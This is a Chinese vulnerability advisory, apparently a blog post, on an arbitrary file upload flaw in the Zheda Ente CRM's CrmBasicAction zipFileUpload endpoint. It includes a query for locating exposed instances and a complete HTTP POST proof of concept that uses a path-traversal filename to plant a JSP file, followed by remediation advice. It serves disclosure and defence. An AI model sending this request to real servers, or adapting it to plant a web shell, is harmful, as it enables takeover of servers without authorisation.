本文介绍了浙江大学恩特公司的一款客户资源管理系统存在的任意文件上传漏洞,攻击者可借此获取服务器权限。作者提供了漏洞复现方法和建议企业升级至安全版本、限制公网访问并设置白名单来保护系统。
产品介绍
浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。
漏洞描述
浙大恩特客户资源管理系统 fcrmbasicaction接口存在任意文件上传漏洞。攻击者可通过该漏洞在服务器端上传后门,执行代码,获取服务器权限,进而控制整个 web 服务器。
资产测绘
title=“欢迎使用浙大恩特客户资源管理系统”
漏洞复现
POC如下:
POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
Content-Length: 267
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=obklzkazkwnc3wsfvxrt
--obklzkazkwnc3wsfvxrt
Content-Disposition: form-data; name="file"; filename="../../=from.jsp"
Content-Type: application/zip
<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
--obklzkazkwnc3wsfvxrt--
访问上传文件:
修复建议
1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。
124
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
